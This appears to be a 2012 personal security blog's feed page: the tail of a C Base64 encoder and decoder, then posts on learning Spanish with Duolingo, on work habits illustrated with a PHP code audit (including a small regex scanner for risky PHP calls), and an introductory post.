<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">fillBytes</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="mi">3</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="p">(</span><span class="n">inputLen</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">3</span><span class="p">))</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">3</span><span class="p">;</span><span class="w"> </span><span class="cm">/* Number of pad characters: 0, 1 or 2 */</span><span class="w"></span>
<span class="w"> </span><span class="n">k</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Walk in 3 byte steps*/</span><span class="w"></span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">inputLen</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="mi">3</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">a0</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="p">)(((</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0xFC</span><span class="p">)</span><span class="w"> </span><span class="o">>></span><span class="w"> </span><span class="mi">2</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">a1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="p">)(((</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0x3</span><span class="p">)</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="mi">4</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">((</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0xF0</span><span class="p">)</span><span class="w"> </span><span class="o">>></span><span class="w"> </span><span class="mi">4</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">a2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="p">)(((</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0xF</span><span class="p">)</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">((</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0xC0</span><span class="p">)</span><span class="w"> </span><span class="o">>></span><span class="w"> </span><span class="mi">6</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">a3</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="p">)((</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0x3F</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">b64alphabet</span><span class="p">[</span><span class="n">a0</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">b64alphabet</span><span class="p">[</span><span class="n">a1</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">b64alphabet</span><span class="p">[</span><span class="n">a2</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">3</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">b64alphabet</span><span class="p">[</span><span class="n">a3</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Prevents buffer overflow */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="mi">3</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">fillBytes</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">inputLen</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="cm">/* Check if we pad */</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* fill byte is either 0, 1 or 2 */</span><span class="w"></span>
<span class="w"> </span><span class="k">switch</span><span class="w"> </span><span class="p">(</span><span class="n">fillBytes</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">0</span><span class="o">:</span><span class="w"> </span><span class="c1">// do nothing</span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">1</span><span class="o">:</span><span class="w"> </span><span class="c1">// last encoded byte becomes pad value</span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">3</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="n">B64_PAD_CHAR</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">2</span><span class="o">:</span><span class="w"> </span><span class="c1">// last two encoded bytes become pad value</span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="n">B64_PAD_CHAR</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">3</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="n">B64_PAD_CHAR</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">k</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="mi">4</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">encodedBuf</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="cm">/* Caller has to free the returned decoded ascii buffer */</span><span class="w"></span>
<span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"> </span>
<span class="nf">Base64Decode</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">,</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">inputLen</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">decodedBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">a0</span><span class="p">,</span><span class="w"> </span><span class="n">a1</span><span class="p">,</span><span class="w"> </span><span class="n">a2</span><span class="p">,</span><span class="w"> </span><span class="n">a3</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">i</span><span class="p">,</span><span class="w"> </span><span class="n">k</span><span class="p">,</span><span class="w"> </span><span class="n">decodedLen</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedLen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">inputLen</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="mi">4</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"> </span><span class="c1">// 3 decoded bytes per 4 encoded chars, plus one byte for the terminating NUL</span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">calloc</span><span class="p">(</span><span class="n">decodedLen</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="kt">char</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">decodedBuf</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"calloc() failed with error %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">errno</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">k</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">inputLen</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="mi">4</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="n">i</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">4</span><span class="p">)</span><span class="w"> </span><span class="o"><=</span><span class="w"> </span><span class="n">inputLen</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">a0</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetIndexByChar</span><span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">0</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">a1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetIndexByChar</span><span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">a2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetIndexByChar</span><span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">2</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">a3</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetIndexByChar</span><span class="p">(</span><span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">3</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">)((</span><span class="n">a0</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">((</span><span class="n">a1</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0x30</span><span class="p">)</span><span class="w"> </span><span class="o">>></span><span class="w"> </span><span class="mi">4</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">)(((</span><span class="n">a1</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0xF</span><span class="p">)</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="mi">4</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">((</span><span class="n">a2</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0x3C</span><span class="p">)</span><span class="w"> </span><span class="o">>></span><span class="w"> </span><span class="mi">2</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">)(((</span><span class="n">a2</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0x3</span><span class="p">)</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="mi">6</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">a3</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Strip pad bytes. Ugly, but working solution... */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">a0</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">100</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sc">'\0'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">a1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">100</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sc">'\0'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">a2</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">100</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sc">'\0'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">a3</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">100</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">decodedBuf</span><span class="p">[</span><span class="n">k</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sc">'\0'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">k</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="mi">3</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">decodedBuf</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="k">static</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"></span>
<span class="nf">GetIndexByChar</span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">c</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">i</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">64</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">b64alphabet</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">c</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="p">)</span><span class="n">i</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">100</span><span class="p">;</span><span class="w"> </span><span class="cm">/* indicates an error */</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>Short essay about my experiences on duolingo.com2012-10-08T13:26:00+02:002012-10-08T13:26:00+02:00Nikolai Tschachertag:incolumitas.com,2012-10-08:/2012/10/08/short-essay-about-my-experiences-on-duolingo-com/<p>Well, it has been a hell of a time since I updated my blog. Honestly, I
was kind of unmotivated to do anything on my VPS, but recently I solved
some old issues (setting up a DNS server, general administration tasks on
my Ubuntu 12.04) and I thought: Yeah, it's definitely time to feed my
countless readers (yeah, you have just met my irony for the first time)
with new interesting nibbles. And since I am a more or less motivated
Spanish student, I thought I could share my pros and cons of duolingo.com.</p>
<p>I started learning Spanish approximately 5 months ago, when I began my
spontaneously planned trip to Costa Rica. I was brutally thrown into a (at
least compared to Europe) very poor country and took Spanish classes for
5 weeks. In retrospect, I'd say that I learned pretty quickly how to
communicate and express myself, but I completely fucked up my
understanding of the language in the long term, because I learned it
the wrong way. Before I even understood what my conversation partner
intended to say, and rather than put myself in the silly but perfectly
normal situation of asking about the unknown word/sentence,
where I would …</p><p>Well, it has been a hell of a time since I updated my blog. Honestly, I
was kind of unmotivated to do anything on my VPS, but recently I solved
some old issues (setting up a DNS server, general administration tasks on
my Ubuntu 12.04) and I thought: Yeah, it's definitely time to feed my
countless readers (yeah, you have just met my irony for the first time)
with new interesting nibbles. And since I am a more or less motivated
Spanish student, I thought I could share my pros and cons of duolingo.com.</p>
<p>I started learning Spanish approximately 5 months ago, when I began my
spontaneously planned trip to Costa Rica. I was brutally thrown into a (at
least compared to Europe) very poor country and took Spanish classes for
5 weeks. In retrospect, I'd say that I learned pretty quickly how to
communicate and express myself, but I completely fucked up my
understanding of the language in the long term, because I learned it
the wrong way. Before I even understood what my conversation partner
intended to say, and rather than put myself in the silly but perfectly
normal situation of asking about the unknown word/sentence,
where I would need to reveal that I didn't understand, I just continued
chatting and babbled in incorrect Spanish, just to save the conversation
and my misplaced ego. Back in Europe, I realized that I needed to build
a solid foundation before I dared to improve, so duolingo.com came
in handy.</p>
<p>First of all: Duolingo.com is absolutely addictive. You can gain skill
points to monitor your learning curve and you can even follow other
learners to compare, which additionally boosts your ambition. There are
lots of courses and you need roughly 3-5 months to complete the grammar
part if you earn 100 points each day. I normally need around 45
minutes to gain my 100 points. Every course also includes a
translation part, which reflects the original purpose of the whole platform
and sheds light on the burning question: Why the hell does
duolingo.com offer free, high-quality language courses, while other platforms
sometimes charge a great deal of money for an equivalent offering?</p>
<p>Well, the idea behind duolingo is that the many hundreds of thousands
of learners will translate documents. These documents could be blog entries
of a very successful internet platform in the English-speaking world. But
right now, the 500 million Spanish-speaking people on this earth can't access
this obviously interesting information, and therefore a lot of potential
advertising consumers are simply lost. The idea is that the thousands of
learners translate this valuable information to make it
accessible to other target groups. Duolingo.com plans to sell
translation services, and I assume that out there in the wild, such a
service is in demand. Now that we have discussed the general concept behind
duolingo.com, how well can you actually learn the foreign language?</p>
<p>In general, I strongly think that there is no such thing as a didactic
miracle tool which turns you into a native speaker in several weeks or
even months. You will absorb and understand a great deal of a language if
you learn it all day long, live it and are completely surrounded by
it. This is the case if you spend a year abroad at a foreign university,
for example. Then, if you are motivated and extroverted, you'll
probably be fluent after 3 or 4 months. But if you learn 1 to 2 hours a
day on duolingo.com, you have a much harder path to follow. After 4
months of daily learning on duolingo, you have a nice vocabulary and an
idea of how the language works, but you don't really feel it and won't
have this verbal/emotional relationship to the sound and feeling of
the culture/language itself. You'll be able to translate advanced
content into Spanish and you will most likely understand the idea behind
a Spanish book, but you can't really use the language in daily speech.
In my opinion, Duolingo replaces the common classroom approach and
increases the fun level, but it can't teach you a language. For that we
need a different strategy: learning in webcam lessons with foreign
people out there! I guess there are thousands of young folks out there
who want to learn your language while you want to learn theirs, so you can
exchange and learn from each other. Then nothing would stand in the way
of learning a language completely over the internet. An amazing
idea!</p>Success2012-07-23T01:09:00+02:002012-07-23T01:09:00+02:00Nikolai Tschachertag:incolumitas.com,2012-07-23:/2012/07/23/success/<p><em>Have you ever wanted to know some strategies and hints how to be more
successful in your daily work?</em></p>
<p>Well, here I'll compile a list of thoughts and scenarios for working effectively, which have worked for me or
at least seem reasonable for my future career.</p>
<p>To illustrate each piece of wisdom, we use the example
of a job assignment I could find myself in: The fictional job requires
a security audit of the employer's content
management system, written in PHP. We have access to all sources,
although the project is proprietary and under a restrictive license.</p>
<h3>1. Develop broad general knowledge.</h3>
<p>The curious reader might ask now: why the hell do we need proper
general knowledge to scan a web application for programming errors which
might weaken its security? Well, before you begin reading every line of
code and do the formal, rather static part of your work, you'd better
square the context of your task with your general knowledge: Where do
the people who wrote the application live? Which language do they
speak? What exactly does the company which runs the CMS offer?</p>
<h3>2. Work at least …</h3><p><em>Have you ever wanted to know some strategies and hints how to be more
successful in your daily work?</em></p>
<p>Well, here I'll compile a list of thoughts and scenarios for working effectively, which have worked for me or
at least seem reasonable for my future career.</p>
<p>To illustrate each piece of wisdom, we use the example
of a job assignment I could find myself in: The fictional job requires
a security audit of the employer's content
management system, written in PHP. We have access to all sources,
although the project is proprietary and under a restrictive license.</p>
<h3>1. Develop broad general knowledge.</h3>
<p>The curious reader might ask now: why the hell do we need proper
general knowledge to scan a web application for programming errors which
might weaken its security? Well, before you begin reading every line of
code and do the formal, rather static part of your work, you'd better
square the context of your task with your general knowledge: Where do
the people who wrote the application live? Which language do they
speak? What exactly does the company which runs the CMS offer?</p>
<h3>2. Work at least 25 minutes at a time</h3>
<p>Have you ever observed yourself working very unsteadily,
constantly interrupting your work sessions? Well, this is very bad for
the quality of your work, since common sense says that the amount you
learn or get done can be estimated by something like the following:</p>
<p>Stuff_Done = Time * Concentration</p>
<p>If you work a lot, but your concentration is weak because your brain
just does not have the time to get accustomed to your task, the efficiency of
your output will most likely suffer. Just force yourself to concentrate
on your work. Do just the specific task; don't check your emails,
go to the toilet or make yourself a coffee. No topic change or bigger
semantic gap should disrupt the session. Set an alarm clock to
actually measure the time.</p>
<h3>3. Become an expert in few things</h3>
<p>This is very important to me and somewhat contradicts the first
rule.</p>
<p>Even in modern times, with ever-changing learning methods and
improvements in information processing, there's still nothing that beats
simple, stubborn learning by heart.<br>
You should know a few tools very well. I will, for example, try to master the programming
language Python sooner or later. It's a very abstract and huge scripting language with a
big standard library, but once you know the majority of the
built-in functions and modules and use them automatically, your
productivity will increase noticeably.<br>
Just imagine you want to make
a first rough scan of the source code of the CMS with a set of regexes
that match common security flaws: The best way would be to use grep or
egrep and code a simple bash script to accomplish the task, but what if
you first have to look up a lot of side information: how to write a while
loop in bash, what the command line arguments of grep mean exactly,
which regex syntax grep expects and the like?<br>
Well, if you then use your good old Python knowledge, you know exactly how to proceed, although
it might not be the most elegant or appropriate way to do it. Using your old
and established toolset, you can focus on the task and won't get
distracted that fast.</p>
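<p>To make the rough regex scan mentioned above a bit more concrete, here is a minimal sketch in Python. The pattern set and the names <code>SUSPICIOUS_PATTERNS</code> and <code>scan_source</code> are purely illustrative assumptions, not a real audit ruleset; an actual review would need many more patterns and manual verification of every hit.</p>

```python
import re

# Hypothetical, deliberately tiny pattern set for illustration only.
SUSPICIOUS_PATTERNS = {
    "call to eval": re.compile(r"\beval\s*\("),
    "request data in SQL query": re.compile(
        r"mysql_query\s*\(.*\$_(GET|POST|REQUEST)"
    ),
    "request data in include": re.compile(
        r"\b(include|require)(_once)?\b.*\$_(GET|POST|REQUEST)"
    ),
}


def scan_source(source):
    """Return a list of (line_number, label) for every suspicious line."""
    findings = []
    for line_number, line in enumerate(source.splitlines(), start=1):
        for label, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(line):
                findings.append((line_number, label))
    return findings
```

<p>Calling <code>scan_source</code> on the text of each PHP file and printing the findings gives roughly what a grep one-liner would, only with a toolset you already know by heart.</p>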
<h3>4. Don't fuck with yourself</h3>
<p>One of the worst motivation and workflow killers is you yourself. Once you
decide to pursue a goal, you should try with all your power to reach it. There
are thousands of hindrances which make it hard and they sometimes seem
impossible to overcome, but the worst of all these obstacles is your
own ego:</p>
<p>Imagine you intended to create a simple guestbook with a specific
functionality and a handy design, but after a few weeks, due to your
stressful and busy time, the task becomes unimportant and you start to
spend your attention on other stuff.<br>
This is wrong, because you betray yourself. Even if the original purpose of the idea might
change or the task itself is barely reachable because of its
complexity, legality or significance, you should try hard to
finish the task. Nothing destroys more credibility and willpower to
start over with new projects than a half-finished, never-completed task.
Your self-esteem will most likely suffer too, because you'll constantly
ask yourself: Am I starting one of these never-ending projects right now?</p>
<p>The best practice to prevent this behavior is to keep a diary which tracks
the exact definition of the goals, the progress and other notes
related to the project. You should define a deadline, and if it is
missed, the project must definitively count as failed.</p>
<h3>5. Intrinsic motivation</h3>
<p>Wikipedia defines intrinsic motivation in the following way:</p>
<blockquote>
<p><strong>Intrinsic motivation</strong> refers to motivation that is driven by an
interest or enjoyment in the task itself, and exists within the
individual rather than relying on any external pressure.</p>
</blockquote>
<p>So, for every big project in your life, like the chosen direction of
your studies or profession, you can only succeed if you like doing it.
It might be possible to force yourself, but it's not the intention of
this post to offer a guide to torturing yourself. First ask if you
principally like what you do, then do it right and in a correct way.</p>Let's begin this...2012-07-01T14:24:00+02:002012-07-01T14:24:00+02:00Nikolai Tschachertag:incolumitas.com,2012-07-01:/2012/07/01/lets-begin-this/<p>Hey World!</p>
<h3>Before you leave!</h3>
<p>This blog and homepage is under construction. Due to the fact that I'm
currently implementing my own little WordPress theme and the rather
embarrassing circumstance that my design knowledge is pretty ...eehhm...
basic, you'd better stay patient until you see the production level of
this blog... That can take several weeks.</p>
<p>I am a 21-year-old German programmer and hopefully, sometime in the
future, a freelance security consultant. In the foreseeable future, I'll
post audit sessions, papers and tutorials on this blog. I would
consider myself a whitehat, so don't expect illicit stuff from me. My
favourite programming languages are Python and C. Everything I do for
myself that can be done painlessly in those programming languages will be
done in one of these.</p>
<p>Maybe you ask yourself what <strong>incolumitas.com</strong> means?</p>
<p>Well, it's the Latin translation for <strong>safety</strong> and since every good
domain name is already taken, I just switched to a different language
(Latin if you're curious) and a not so common word for safety. The DNS
name matches my needs perfectly, because it points directly to the main
intention of this site:</p>
<p><em>Offering security services.</em></p>
<p>You can hire me. Don't …</p><p>Hey World!</p>
<h3>Before you leave!</h3>
<p>This blog and homepage is under construction. Due to the fact that I'm
currently implementing my own little WordPress theme and the rather
